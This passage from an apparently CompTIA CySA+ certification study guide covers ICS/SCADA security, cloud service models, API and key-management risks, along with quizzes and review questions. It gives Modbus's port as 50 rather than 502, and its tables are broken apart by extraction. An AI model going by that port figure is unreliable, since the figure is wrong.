same door of entry as found in connected cars. In January
2020, the U.S. Department of the Interior grounded
nonemergency drones due to security concerns. Why? The U.S.
Department of Defense (DoD) issued warnings that Chinesemade drones may be compromised and capable of being used
for espionage. This follows a memo from the Navy & Marine
Corps Small Tactical Unmanned Aircraft Systems Program
Manager that “images, video and flight records could be
uploaded to unsecured servers in other countries via live
streaming.” Finally, the U.S. Department of Homeland Security
previously warned the private sector that their data may be
pilfered if they use commercial drone systems made in China.
Beyond the fear of Chinese-made drones that contain
backdoors, there is also the risk of a drone being “hacked” and
taken over by the attacker in midflight. Since 2016, it has been
known that it is possible in some cases to do the following:
Overwhelm the drone with thousands of connection requests,
causing the drone to land
Send large amounts of data to the drone, exceeding its capacity and
causing it to crash
Convince the drone that orders sent to land the drone were coming
from the drone itself rather than attackers, causing the drone to
follow orders and land
At the time of writing in 2020, attackers have had four years to
probe for additional attack points. It is obvious that drone
security has to be made more robust.
WORKFLOW AND PROCESS
AUTOMATION SYSTEMS
Automating workflows and processes saves time and human
resources. One of the best examples is the automation
revolution occurring in network management. Automation tools
such as Puppet, Chef, and Ansible and scripting are automating
once manual tasks such as log analyses, patch application, and
intrusion prevention.
These tools and scripts perform the job they do best, which is
manual drudgery, thus freeing up humans to do what they do
best, which is deep analysis and planning. Alas, with
automation comes vulnerabilities. An example is the cross-site
scripting (XSS) vulnerability found in IBM workflow systems, as
detailed in CVE-2019-4149, which can allow users to embed
arbitrary JavaScript code in the Web UI, thus altering the
intended functionality and potentially leading to credentials
disclosure within a trusted session. These automation systems
also need to be made more secure.
INCIDENT COMMAND SYSTEM (ICS)
The Incident Command System (ICS) is designed by
FEMA to provide a way to enable effective and efficient
domestic incident management by integrating a combination of
facilities, equipment, personnel, procedures, and
communications operating within a common organizational
structure.
ICS provides guidance for how to organize assets to respond to
an incident (system description) and processes to manage the
response through its successive stages (concept of operations).
All response assets are organized into five functional areas:
Command, Operations, Logistics, Planning, and
Administration/Finance. Figure 5-5 highlights the five
functional areas of ICS and their primary responsibilities.
Figure 5-5 Functional Areas of ICS
SUPERVISORY CONTROL AND DATA
ACQUISITION (SCADA)
Industrial control system (ICS) is a general term that
encompasses several types of control systems used in industrial
production. The most widespread is supervisory control
and data acquisition (SCADA). SCADA is a system that
operates with coded signals over communication channels to
provide control of remote equipment. ICSs include the following
components:
Sensors: Sensors typically have digital or analog I/O and are not in
a form that can be easily communicated over long distances.
Remote terminal units (RTUs): RTUs connect to the sensors
and convert sensor data to digital data, including telemetry
hardware.
Programmable logic controllers (PLCs): PLCs connect to the
sensors and convert sensor data to digital data; they do not include
telemetry hardware.
Telemetry system: Such a system connects RTUs and PLCs to
control centers and the enterprise.
Human interface: Such an interface presents data to the
operator.
ICSs should be securely segregated from other networks as a
security layer. The Stuxnet virus hit the SCADA systems used
for the control and monitoring of industrial processes. SCADA
components are considered privileged targets for cyberattacks.
By using cyber tools, it is possible to destroy an industrial
process. This was the idea used on the attack on the nuclear
plant in Natanz in order to interfere with the Iranian nuclear
program.
Considering the criticality of SCADA-based systems, physical
access to these systems must be strictly controlled. Systems that
integrate IT security with physical access controls, such as
badging systems and video surveillance, should be deployed. In
addition, a solution should be integrated with existing
information security tools such as log management and
IPS/IDS. A helpful publication by NIST, SP 800-82 Rev. 2,
recommends the major security objectives for an ICS
implementation should include the following:
Restricting logical access to the ICS network and network activity
Restricting physical access to the ICS network and devices
Protecting individual ICS components from exploitation
Restricting unauthorized modification of data
Detecting security events and incidents
Maintaining functionality during adverse conditions
Restoring the system after an incident
In a typical ICS, this means a defense-in-depth strategy should
include the following, according to SP 800-82 Rev. 2:
Develop security policies, procedures, training, and educational
material that applies specifically to the ICS.
Address security throughout the life cycle of the ICS.
Implement a network topology for the ICS that has multiple layers,
with the most critical communications occurring in the most secure
and reliable layer.
Provide logical separation between the corporate and ICS networks.
Employ a DMZ network architecture.
Ensure that critical components are redundant and are on
redundant networks.
Design critical systems for graceful degradation (fault tolerant) to
prevent catastrophic cascading events.
Disable unused ports and services on ICS devices after testing to
assure this will not impact ICS operation.
Restrict physical access to the ICS network and devices.
Restrict ICS user privileges to only those that are required to
perform each person’s job.
Use separate authentication mechanisms and credentials for users
of the ICS network and the corporate network.
Use modern technology, such as smart cards, for Personal Identity
Verification (PIV).
Implement security controls such as intrusion detection software,
antivirus software, and file integrity checking software, where
technically feasible, to prevent, deter, detect, and mitigate the
introduction, exposure, and propagation of malicious software to,
within, and from the ICS.
Apply security techniques such as encryption and/or cryptographic
hashes to ICS data storage and communications where determined
appropriate.
Expeditiously deploy security patches after testing all patches under
field conditions on a test system if possible, before installation on
the ICS.
Track and monitor audit trails on critical areas of the ICS.
Employ reliable and secure network protocols and services where
feasible.
SP 800-82 Rev. 2 recommends that security professionals
should consider the following when designing security solutions
for ICS devices: timeliness and performance requirements,
availability requirements, risk management requirements,
physical effects, system operation, resource constraints,
communications, change management, managed support,
component lifetime, and component location.
ICS implementations use a variety of protocols and services,
including
Modbus: A master/slave protocol that uses port 50
BACnet: A master/slave protocol that uses port 47808 (introduced
earlier in this chapter)
LonWorks/LonTalk: A peer-to-peer protocol that uses port 1679
Distributed Network Protocol 3 (DNP3): A master/slave
protocol that uses port 19999 when using Transport Layer Security
(TLS) and port 20000 when not using TLS
ICS implementations can also use IEEE 802.1X, Zigbee, and
Bluetooth for communication.
SP 800-82 Rev. 2 outlines the following basic process for
developing an ICS security program:
1. Develop a business case for security.
2. Build and train a cross-functional team.
3. Define charter and scope.
4. Define specific ICS policies and procedures.
5. Implement an ICS Security Risk Management Framework.
1. Define and inventory ICS assets.
2. Develop a security plan for ICS systems.
3. Perform a risk assessment.
4. Define the mitigation controls.
6. Provide training and raise security awareness for ICS staff.
The ICS security architecture should include network
segregation and segmentation, boundary protection, firewalls, a
logically separated control network, and dual network interface
cards (NICs) and should focus mainly on suitable isolation
between control networks and corporate networks. Security
professionals should also understand that many ICS/SCADA
systems use weak authentication and outdated operating
systems. The inability to patch these systems (and even the lack
of available patches) means that the vendor is usually not
proactively addressing any identified security issues. Finally,
many of these systems allow unauthorized remote access,
thereby making it easy for an attacker to breach the system with
little effort.
Modbus
As you learned in the previous discussion, Modbus is one of the
protocols used in industrial control systems. It is a serial
protocol created by Modicon (now Schneider Electric) to be
used by its PLCs. It is popular because it is royalty free. It
enables communication among many devices connected to the
same network; for example, a system that measures water flow
and communicates the results to a computer. An example of a
Modbus architecture is shown in Figure 5-6.
Figure 5-6 Modbus Architecture
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 5-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 5-2 Key Topics in Chapter 5
Key
Topic
Element
Description
Page
Numb
er
Bullete
d list
Threats presented by the introduction of
personal mobile devices into the workplace
97
Bullete
d list
Security best practices when developing
push notification services
100
Section
Mobile payment technologies
101
Bullete
d list
Steps to secure NFC payment mechanisms
101
Bullete
d list
IoT deployment categories
104
Bullete
d list
Methods of securing IoT devices
104
Bullete
d list
Considerations when selecting IoT devices
104
Bullete
d list
Physical access control systems
108
Bullete
d list
IoT wireless issues
109
Bullete
d list
Issues to consider and plan for when
implementing IP video systems
110
Bullete
d list
ICS components
115
Bullete
d list
Security objectives for an ICS
implementation
115
Bullete
d list
ICS defense-in-depth strategy
115
Bullete
d list
ICS protocols
117
Numbe
red list
Developing an ICS security program
117
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
mobile device management (MDM)
bring your own device (BYOD) policies
Payment Card Industry Data Security Standard (PCI DSS)
USB On-The-Go (USB OTG)
rooting or jailbreaking
push notification services
geotagging
near field communication (NFC)
domain bridging
Internet of Things (IoT)
embedded system
real-time operating system (RTOS)
System-on-Chip (SoC)
field programmable gate array (FPGA)
mantrap
proximity readers
Building Automation and Control Networks (BACnet)
Controller Area Network (CAN bus)
Incident Command System (ICS)
supervisory control and data acquisition (SCADA)
remote terminal units (RTUs)
programmable logic controllers (PLCs)
telemetry system
Modbus
LonWorks/LonTalk
Distributed Network Protocol 3 (DNP3)
REVIEW QUESTIONS
1. List at least two threats presented by the introduction of
personal mobile devices (smartphones and tablets) into an
organization’s network.
2. What is the single biggest threat to mobile devices?
3. Match the term on the left with its definition on the right.
Ter
ms
Definitions
U
S
B
O
T
G
Used to control mobile device settings, applications, and
other parameters when those devices are attached to the
enterprise network
B
Y
O
D
A specification first used in late 2001 that allows USB
devices, such as tablets or smartphones, to act as either a
USB host or a USB device
M
D
M
Polices designed to allow personal devices in the network
I
C
S
Designed to provide a way to enable effective and efficient
domestic incident management by integrating a
combination of facilities, equipment, personnel, procedures,
and communications operating within a common
organizational structure
4. ___________________ refers to a system of
interrelated computing devices, mechanical and digital
machines, and objects that are provided with unique
identifiers and the ability to transfer data over a network
without requiring human-to-human or human-to-computer
interaction.
5. What process enabled the enemy to pinpoint the location of
four U.S. Army Apache helicopters on the ground and
destroy them?
6. Match the term on the left with its definition on the right.
Terms
Definitions
Emb
edde
d
syste
m
A system that operates with coded signals over
communication channels to provide control of remote
equipment
SoC
Industrial control system component that connects to the
sensors and converts sensor data to digital data,
including telemetry hardware
RTU
An integrated circuit (also known as a chip) that
integrates all components of a computer or other
electronic system
SCA
DA
A piece of software built into a larger piece of software
7. __________________ is a text messaging service
component of most telephone, World Wide Web, and mobile
telephony systems.
8. List at least one example of an IoT deployment.
9. A(n) __________________ is a series of two doors with
a small room between them.
10. To use the BACnet protocol in an IP world,
__________________ was developed.
Chapter 6
Threats and Vulnerabilities
Associated with Operating
in the Cloud
This chapter covers the following topics related to Objective 1.6
(Explain the threats and vulnerabilities associated with operating
in the cloud) of the CompTIA Cybersecurity Analyst (CySA+) CS0002 certification exam:
Cloud service models: Describes Software as a Service (SaaS),
Platform as a Service (PaaS), and Infrastructure as a Service (IaaS).
Cloud deployment models: Covers public, private, community,
and hybrid clouds.
Function as a Service (FaaS)/serverless architecture:
Discusses the concepts of FaaS.
Infrastructure as Code (IaC): Investigates the use of scripting
in the environment.
Insecure application programming interface (API):
Identifies vulnerabilities in the use of APIs.
Improper key management: Discusses best practices for key
management.
Unprotected storage: Describes threats to storage systems.
Logging and monitoring: Covers issues related to insufficient
logging and monitoring and inability to access logging tools.
Placing resources in a cloud environment has many benefits,
but also introduces a host of new security considerations. This
chapter discusses these vulnerabilities and some measures that
you can take to mitigate them.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these eight self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 6-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 6-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Questio
n
Cloud Deployment Models
1
Cloud Service Models
2
Function as a Service (FaaS)/Serverless
Architecture
3
Infrastructure as Code (IaC)
4
Insecure Application Programming Interface (API)
5
Improper Key Management
6
Unprotected Storage
7
Logging and Monitoring
8
Caution
The goal of self-assessment is to gauge your mastery of the topics in this
chapter. If you do not know the answer to a question or are only partially sure of
the answer, you should mark that question as wrong for purposes of the selfassessment. Giving yourself credit for an answer you correctly guess skews
your self-assessment results and might provide you with a false sense of
security.
1. In which cloud deployment model does an organization
provide and manage some resources in-house and has other
resources provided externally via a public cloud?
1. Private
2. Public
3. Community
4. Hybrid
2. Which of the following cloud service models is typically used
as a software development environment?
1. SaaS
2. PaaS
3. IaaS
4. FaaS
3. Which of the following is an extension of the PaaS model?
1. FaaS
2. IaC
3. SaaS
4. IaaS
4. Which of the following manages and provisions computer
data centers through machine-readable definition files?
1. IaC
2. PaaS
3. SaaS
4. IaaS
5. Which of the following can enhance security of APIs?
1. DPAPI
2. SGX
3. SOAP
4. REST
6. Which of the following contains recommendations for key
management?
1. NIST SP 800-57 REV. 5
2. PCI-DSS
3. OWASP
4. FIPS
7. Which of the following is the most exposed part of a cloud
deployment?
1. Cryptographic functions
2. APIs
3. VMs
4. Containers
8. Which of the following is lost with improper auditing?
(Choose the best answer.)
1. Cryptographic security
2. Accountability
3. Data security
4. Visibility
FOUNDATION TOPICS
CLOUD DEPLOYMENT MODELS
Cloud computing is all the rage these days, and it comes in
many forms. The basic idea of cloud computing is to make
resources available in a web-based data center so the resources
can be accessed from anywhere. When a company pays another
company to host and manage this type of environment, it is
considered to be a public cloud solution. If the company hosts
this environment itself, it is considered to be a private cloud
solution. The different cloud deployment models are as follows:
Public: A public cloud is the standard cloud deployment model,
in which a service provider makes resources available to the public
over the Internet. Public cloud services may be free or may be
offered on a pay-per-use model. An organization needs to have a
business or technical liaison responsible for managing the vendor
relationship but does not necessarily need a specialist in cloud
deployment. Vendors of public cloud solutions include Amazon,
IBM, Google, Microsoft, and many more. In a public cloud
deployment model, subscribers can add and remove resources as
needed, based on their subscription.
Private: A private cloud is a cloud deployment model in which a
private organization implements a cloud in its internal enterprise,
and that cloud is used by the organization’s employees and
partners. Private cloud services require an organization to employ a
specialist in cloud deployment to manage the private cloud.
Community: A community cloud is a cloud deployment model
in which the cloud infrastructure is shared among several
organizations from a specific group with common computing needs.
In this model, agreements should explicitly define the security
controls that will be in place to protect the data of each organization
involved in the community cloud and how the cloud will be
administered and managed.
Hybrid: A hybrid cloud is a cloud deployment model in which
an organization provides and manages some resources in-house
and has others provided externally via a public cloud. This model
requires a relationship with the service provider as well as an inhouse cloud deployment specialist. Rules need to be defined to
ensure that a hybrid cloud is deployed properly. Confidential and
private information should be limited to the private cloud.
CLOUD SERVICE MODELS
There is trade-off to consider when a decision must be made
between cloud architectures. A private solution provides the
most control over the safety of your data but also requires the
staff and the knowledge to deploy, manage, and secure the
solution. A public cloud puts your data’s safety in the hands of a
third party, but that party is more capable and knowledgeable
about protecting data in such an environment and managing
the cloud environment. With a public solution, various cloud
service models can be purchased. Some of these models include
the following:
Software as a Service (SaaS): With SaaS, the vendor provides
the entire solution, including the operating system, the
infrastructure software, and the application. The vendor may
provide an email system, for example, in which it hosts and
manages everything for the customer. An example of this is a
company that contracts to use Salesforce or Intuit QuickBooks
using a browser rather than installing the application on every
machine. This frees the customer company from performing
updates and other maintenance of the applications.
Platform as a Service (PaaS): With PaaS, the vendor provides
the hardware platform or data center and the software running on
the platform, including the operating systems and infrastructure
software. The customer is still involved in managing the system. An
example of this is a company that engages a third party to provide a
development platform for internal developers to use for
development and testing.
Infrastructure as a Service (IaaS): With IaaS, the vendor
provides the hardware platform or data center, and the customer
installs and manages its own operating systems and application
systems. The vendor simply provides access to the data center and
maintains that access. An example of this is a company hosting all
its web servers with a third party that provides the infrastructure.
With IaaS, customers can benefit from the dynamic allocation of
additional resources in times of high activity, while those same
resources are scaled back when not needed, which saves money.
Figure 6-1 illustrates the relationship of these services to one
another.
FIGURE 6-1 Cloud Service Models
FUNCTION AS A SERVICE
(FAAS)/SERVERLESS ARCHITECTURE
Function as a Service (FaaS) is an extension of PaaS that
goes further and completely abstracts the virtual server from the
developers. In fact, charges are based not on server instance
sizes but on consumption and executions. This is why it is
sometimes also called serverless architecture. In this
architecture, the focus is on a function, operation, or piece of
code that is executed as a function. These services are eventdriven in nature.
Although FaaS is not perfect for every workload, for
transactions that happen hundreds of times per second, there is
a lot of value in isolating that logic to a function that can be
scaled. Additional advantages include the following:
Ideal for dynamic or burstable workloads: If you run
something only once a day or month, there’s no need to pay for a
server 24/7/365.
Ideal for scheduled tasks: FaaS is a perfect way to run a certain
piece of code on a schedule.
Figure 6-2 shows a useful car analogy for comparing traditional
computing (own a car), cloud computing (rent a car), and
FaaS/serverless computing (car sharing). VPS in the rent-a-car
analogy stands for virtual private server and refers to
provisioning a virtual server from a cloud service provider.
Figure 6-2 Car Analogy for Serverless Computing
The following are top security issues with serverless computing:
Function event data injection: Triggered through untrusted
input such as through a web API call
Broken authentication: Coding issues ripe for exploit and
attacks, which lead to unauthorized authentication
Insecure serverless deployment configuration: Human
error in setup
Over-privileged function permissions and roles: Failure to
implement the least privilege concept
INFRASTRUCTURE AS CODE (IAC)
In another reordering of the way data centers are handled,
Infrastructure as Code (IaC) manages and provisions
computer data centers through machine-readable definition
files, rather than physical hardware configuration or interactive
configuration tools. IaC can use either scripts or declarative
definitions, rather than manual processes, but the term more
often is used to promote declarative approaches.
Naturally, there are advantages to this approach:
Lower cost
Faster speed
Risk reduction (remove errors and security violations)
Figure 6-3 illustrates an example of how some code might be
capable of making changes on its own without manual
intervention. As you can see in Figure 6-3, these code changes
can be made to the actual state of the configurations in the
cloud without manual intervention.
Figure 6-3 IaC in Action
Security issues with Infrastructure as Code (IaC) include
Compliance violations: Policy guardrails based on standards are
not enforced
Data exposures: Lack of encryption
Hardcoded secrets: Storing plain text credentials, such as SSH
keys or account secrets, within source code
Disabled audit logs: Failure to utilize audit logging services like
AWS CloudTrail and Amazon CloudWatch
Untrusted image sources: Templates may inadvertently refer to
OS or container images from untrusted sources
INSECURE APPLICATION PROGRAMMING
INTERFACE (API)
Interfaces and APIs tend to be the most exposed parts of a
system because they’re usually accessible from the open
Internet. APIs are used extensively in cloud environments. With
respect to APIs, a host of approaches—including Simple Object
Access Protocol (SOAP), REpresentational State Transfer
(REST), and JavaScript Object Notation (JSON)—are available,
and many enterprises find themselves using all of them.
The use of diverse protocols and APIs is also a challenge to
interoperability. With networking, storage, and authentication
protocols, support and understanding of the protocols in use is
required of both endpoints. It should be a goal to reduce the
number of protocols in use in order to reduce the attack surface.
Each protocol has its own history of weaknesses to mitigate.
One API that can enhance cloud security is the Data
Protection API (DPAPI) offered by Windows. Let’s look at
what it offers. Among other features, DPAPI supports inmemory processing, an approach in which all data in a set is
processed from memory rather than from the hard drive. Inmemory processing assumes that all the data is available in
memory rather than just the most recently used data, as is
usually the case when using RAM or cache memory. This results
in faster reporting and decision making in business. Securing
in-memory processing requires encrypting the data in RAM.
DPAPI lets you encrypt data using the user’s login credentials.
One of the key questions is where to store the key, because
storing it in the same location as the data typically is not a good
idea (the next section discusses key management). Intel’s
Software Guard Extensions (SGX), shipping with Skylake and
newer CPUs, allows you to load a program into your processor,
verify that its state is correct (remotely), and protect its
execution. The CPU automatically encrypts everything leaving
the processor (that is, everything that is offloaded to RAM) and
thereby ensures security.
Even the most secure devices have some sort of API that is used
to perform tasks. Unfortunately, untrustworthy people use
those same APIs to perform unscrupulous tasks. APIs are used
in the Internet of Things (IoT) so that devices can speak to each
other without users even knowing they are there. APIs are used
to control and monitor things we use every day, including
fitness bands, home thermostats, lighting, and automobiles.
Comprehensive security must protect the entire spectrum of
devices in the digital workplace, including apps and APIs. API
security is critical for an organization that is exposing digital
assets.
Guidelines for providing API security include the following:
Use the same security controls for APIs as for any web application
in the enterprise.
Use Hash-based Message Authentication Code (HMAC).
Use encryption when passing static keys.
Use a framework or an existing library to implement security
solutions for APIs.
Implement password encryption instead of single key-based
authentication.
IMPROPER KEY MANAGEMENT
Key management is essential to ensure that the cryptography
provides confidentiality, integrity, and authentication in cloud
environments. If a key is compromised, it can have serious
consequences throughout an organization.
Key management involves the entire process of ensuring that
keys are protected during creation, distribution, transmission,
and storage. As part of this process, keys must also be destroyed
properly. When you consider the vast number of networks over
which the key is transmitted and the different types of systems
on which a key is stored, the enormity of this issue really comes
to light.
As the most demanding and critical aspect of cryptography, it is
important that security professionals understand key
management principles.
Keys should always be stored in ciphertext when stored on a
noncryptographic device. Key distribution, storage, and
maintenance should be automatic by integrating the processes
into the application.
Because keys can be lost, backup copies should be made and
stored in a secure location. A designated individual should have
control of the backup copies, and other individuals should be
designated to serve as emergency backups. The key recovery
process should also require more than one operator, to ensure
that only valid key recovery requests are completed. In some
cases, keys are even broken into parts and deposited with
trusted agents, who provide their part of the key to a central
authority when authorized to do so. Although other methods of
distributing parts of a key are used, all the solutions involve the
use of trustee agents entrusted with part of the key and a central
authority tasked with assembling the key from its parts. Also,
key recovery personnel should span across the entire
organization and not just be members of the IT department.
Organizations should also limit the number of keys that are
used. The more keys that you have, the more keys you must
ensure are protected. Although a valid reason for issuing a key
should never be ignored, limiting the number of keys issued and
used reduces the potential damage.
When designing the key management process, you should
consider how to do the following:
Securely store and transmit the keys
Use random keys
Issue keys of sufficient length to ensure protection
Properly destroy keys when no longer needed
Back up the keys to ensure that they can be recovered
Systems that process valuable information require controls in
order to protect the information from unauthorized disclosure
and modification. Cryptographic systems that contain keys and
other cryptographic information are especially critical. Security
professionals should work to ensure that the protection of
keying material provides accountability, audit, and survivability.
Accountability involves the identification of entities that have
access to, or control of, cryptographic keys throughout their life
cycles. Accountability can be an effective tool to help prevent
key compromises and to reduce the impact of compromises
when they are detected. Although it is preferred that no humans
be able to view keys, as a minimum, the key management
system should account for all individuals who are able to view
plaintext cryptographic keys. In addition, more sophisticated
key management systems may account for all individuals
authorized to access or control any cryptographic keys, whether
in plaintext or ciphertext form.
Two types of audits should be performed on key management
systems:
Security: The security plan and the procedures that are developed
to support the plan should be periodically audited to ensure that
they continue to support the key management policy.
Protective: The protective mechanisms employed should be
periodically reassessed with respect to the level of security they
currently provide and are expected to provide in the future. They
should also be assessed to determine whether the mechanisms
correctly and effectively support the appropriate policies. New
technology developments and attacks should be considered as part
of a protective audit.
Key management survivability entails backing up or archiving
copies of all keys used. Key backup and recovery procedures
must be established to ensure that keys are not lost. System
redundancy and contingency planning should also be properly
assessed to ensure that all the systems involved in key
management are fault tolerant.
Key Escrow
Key escrow is the process of storing keys with a third party to
ensure that decryption can occur. This is most often used to
collect evidence during investigations. Key recovery is the
process whereby a key is archived in a safe place by the
administrator.
Key Stretching
Key stretching, also referred to as key strengthening, is a
cryptographic technique that involves making a weak key
stronger by increasing the time it takes to test each possible key.
In key stretching, the original key is fed into an algorithm to
produce an enhanced key, which should be at least 128 bits for
effectiveness. If key stretching is used, an attacker would need
to either try every possible combination of the enhanced key or
try likely combinations of the initial key. Key stretching slows
down the attacker because the attacker must compute the
stretching function for every guess in the attack. Systems that
use key stretching include Pretty Good Privacy (PGP), GNU
Privacy Guard (GPG), Wi-Fi Protected Access (WPA), and
WPA2. Widely used password key-stretching algorithms include
Password-Based Key Derivation Function 2 (PBKDF2), bcrypt,
and scrypt.
UNPROTECTED STORAGE
While cloud storage may seem like a great idea, it presents
many unique issues. Among them are the following:
Data breaches: Although cloud providers may include safeguards
in service-level agreements (SLAs), ultimately the organization is
responsible for protecting its own data, regardless of where it is
located. When this data is not in your hands—and you may not even
know where it is physically located at any point in time—protecting
your data is difficult.
Authentication system failures: These failures allow malicious
individuals into the cloud. This issue sometimes is made worse by
the organization itself when developers embed credentials and
cryptographic keys in source code and leave them in public-facing
repositories.
Weak interfaces and APIs: Interfaces and APIs tend to be the
most exposed parts of a system because they’re usually accessible
from the open Internet.
Transfer/Back Up Data to Uncontrolled Storage
In some cases, users store sensitive data in cloud storage that is
outside the control of the organization, using sites such as
Dropbox. These storage providers have had their share of data
loss issues as well. Policies should address and forbid this type
of storage of data from mobile devices.
Cloud services give end users more accessibility to their data.
However, this also means that end users can take advantage of
cloud storage to access and share company data from any
location. At that point, the IT team no longer controls the data.
This is the case with both public and private clouds.
With private clouds, organizations can ensure the following:
That the data is stored only on internal resources
That the data is owned by the organization
That only authorized individuals are allowed to access the data
That data is always available
However, a private cloud is only protected by the organization’s
internal resources, and this protection can often be affected by
the knowledge level of the security professionals responsible for
managing the cloud security.
With public clouds, organizations can ensure the following:
That data is protected by enterprise-class firewalls and within a
secured facility
That attackers and disgruntled employees are unsure of where the
data actually resides
That the cloud vendor provides security expertise and maintains the
level of service detailed in the contract
However, public clouds can grant access to any location, and
data is transmitted over the Internet. Also, the organization
depends on the vendor for all services provided. End users must
be educated about cloud usage and limitations as part of their
security awareness training. In addition, security policies should
clearly state where data can be stored, and ACLs should be
configured properly to ensure that only authorized personnel
can access data. The policies should also spell out consequences
for storing organizational data in cloud locations that are not
authorized.
Big Data
Big data is a term for sets of data so large or complex that they
cannot be analyzed by using traditional data processing
applications. These data sets are often stored in the cloud to
take advantage of the immense processing power available
there. Specialized applications have been designed to help
organizations with their big data. The big data challenges that
may be encountered include data analysis, data capture, data
search, data sharing, data storage, and data privacy.
While big data is used to determine the causes of failures,
generate coupons at checkout, recalculate risk portfolios, and
find fraudulent activity before it ever has a chance to affect the
organization, its existence creates security issues. The first issue
is its unstructured nature. Traditional data warehouses process
structured data and can store large amounts of it, but there is
still a requirement for structure.
Big data typically uses Hadoop, which requires no structure.
Hadoop is an open source framework used for running
applications and storing data. With the Hadoop Distributed File
System, individual servers that are working in a cluster can fail
without aborting the entire computation process. There are no
restrictions on the data that this system can store. While big
data is enticing because of the advantages it offers, it presents a
number of issues when deployed in the cloud.
Organizations still do not understand it very well, and unexpected
vulnerabilities can easily be introduced.
Open source codes are typically found in big data, which can result
in unrecognized backdoors. It can contain default credentials.
Attack surfaces of the nodes may not have been reviewed, and
servers may not have been hardened sufficiently.
LOGGING AND MONITORING
Without proper auditing, you have no accountability. You also
have no way of knowing what is going on in your environment.
While the next two chapters include ample discussion of logging
and monitoring and its application, this section briefly
addresses the topic with respect to cloud environments.
Insufficient Logging and Monitoring
Unfortunately, although most technicians agree with and
support the notion that proper auditing is necessary, in the case
of cloud deployments, the logging and monitoring can leave
much to be desired. “Insufficient Logging and Monitoring” is
one of the categories in the Open Web Application Security
Project’s (OWASP) Top 10 list and covers the list of best
practices that should be in place to prevent or limit the damage
of security breaches.
Security professionals should work to ensure that cloud SLAs
include access to logging and monitoring tools that give the
organization visibility into the cloud system in which their data
is held.
Inability to Access
One of the issue with utilizing standard logging and monitoring
tools in a cloud environment is the inability to access the
environment in a way that renders visibility into the
environment. In some cases, the vendor will resist allowing
access to its environment. The time to demand such access is
when the SLA is in the process of being negotiated.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 6-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 6-2 Key Topics in Chapter 6
Key Topic Element
Description
Page Number
Bullet
ed list
Cloud deployment models
1
2
6
Bullet
ed list
Cloud service models
1
2
7
Bullet
ed list
Advantages of FaaS
1
2
9
Bullet
ed list
Top security issues with serverless computing
1
2
9
Bullet
ed list
Advantages of IaC
1
3
0
Bullet
ed list
Security issues with Infrastructure as Code (IaC)
1
3
0
Bullet
ed list
Guidelines for providing API security
1
3
1
Bullet
ed list
Designing the key management process
1
3
2
Bullet
ed list
Types of audit that should be performed on key
management systems
1
3
3
Bullet
ed list
Security issues with cloud storage
1
3
4
Bullet
ed list
Capabilities with private and public clouds
1
3
5
Bullet
ed list
Issues with big data
1
3
6
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
Software as a Service (SaaS)
Platform as a Service (PaaS)
Infrastructure as a Service (IaaS)
public cloud
private cloud
community cloud
hybrid cloud
Function as a Service (FaaS)
Infrastructure as Code (IaC)
Data Protection API (DPAPI)
NIST SP 800-57 REV. 5
key escrow
key stretching
big data
REVIEW QUESTIONS
1. With ______________, the vendor provides the entire
solution, including the operating system, the infrastructure
software, and the application.
2. Match the terms on the left with their definitions on the
right.
Ter
ms
Definitions
F
a
a
S
Manages and provisions computer data centers through
machine-readable definition files.
I
a
C
The vendor provides the hardware platform or data center,
and the customer installs and manages its own operating
systems and application systems.
P
a
a
S
The vendor provides the hardware platform or data center
and the software running on the platform, including the
operating systems and infrastructure software.
I
a
a
S
Completely abstracts the virtual server from the developers.
3. List at least one advantage of IaC.
4. ___________________ tend to be the most exposed
parts of a cloud system because they’re usually accessible
from the open Internet.
5. APIs are used in the ___________________ so that
devices can speak to each other without users even knowing
the APIs are there.
6. List at least one of the security issues with serverless
computing in the cloud.
7. Match the key state on the left with its definition on the
right.
Terms
Definitions
Preactiv
ation
state
Temporarily inactive
Susp
ende
d
state
Keys may be used to cryptographically protect
information
Deac
tivat
ed
state
Discovered by an unauthorized entity
Activ
e
state
Key has been generated but has not been authorized for
use
Com
pro
mise
d
state
Keys are not used to apply cryptographic protection, but
in some cases, they may be used to process
cryptographically protected information
8. In the _______________ phase of a key, the keying
material is not yet available for normal cryptographic
operations.
9. List at least one security issue with cloud storage.
10. ________________ is a term for sets of data so large or
complex that they cannot be analyzed by using traditional
data processing applications.
Chapter 7
Implementing Controls to
Mitigate Attacks and
Software Vulnerabilities
This chapter covers the following topics related to Objective 1.7
(Given a scenario, implement controls to mitigate attacks and
software vulnerabilities) of the CompTIA Cybersecurity Analyst
(CySA+) CS0-002 certification exam:
Attack types: Describes XML attacks, SQL injection, overflow
attacks, remote code execution, directory traversal, privilege
escalation, password spraying, credential stuffing, impersonation,
man-in-the-middle attacks, session hijacking, rootkit, and cross-site
scripting.
Vulnerabilities: Covers improper error handling, dereferencing,
insecure object reference, race condition, broken authentication,
sensitive data exposure, insecure components, insufficient logging
and monitoring, weak or default configurations, and use of insecure
functions.
When vulnerabilities have been identified and possible attacks
have been anticipated, controls are used to mitigate or address
them. In some cases these controls can eliminate a
vulnerability, but in many cases they can only lessen the
likelihood or the impact of an attack. This chapter discusses the
various types of controls and how they can be used.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these four self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
